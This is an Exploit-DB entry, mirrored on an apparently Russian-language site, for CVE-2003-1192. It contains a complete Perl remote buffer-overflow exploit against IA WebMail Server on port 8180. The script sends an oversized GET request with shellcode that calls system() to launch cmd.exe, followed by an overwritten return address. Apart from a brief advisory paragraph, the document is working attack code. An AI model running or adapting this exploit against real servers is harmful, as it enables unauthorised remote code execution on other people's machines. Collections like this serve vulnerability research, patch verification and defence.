- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23334
- Проверка EDB
-
- Пройдено
- Автор
- PETER WINTER-SMITH
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2003-1192
- Дата публикации
- 2003-11-03
Код:
source: https://www.securityfocus.com/bid/8965/info
IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution.
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "8180",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x90", # - NOP
"\x8B\xEC", # - MOV EBP, ESP
"\x55", # - PUSH EBP
"\x8B\xEC", # - MOV EBP, ESP
"\x33\xFF", # - XOR EDI, EDI
"\x57", # - PUSH EDI
"\x83\xEC\x04", # 0 SUB ESP, 4
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50", # - PUSH EAX
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50", # - PUSH EAX
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
"\x5F" # - POP EDI
);
$eip = "\x4c\xf8\x12";
#0012f84C
#$eip = "AAAA";
$request = join ("", "GET /", $shellcode, "A"x(1040-length($shellcode)),
$eip, " HTTP/1.1\r
Host: $host\r
Connection: close\r
\r
\r\n");
print $remote $request;
sleep(1);
close $remote;- Источник
- www.exploit-db.com
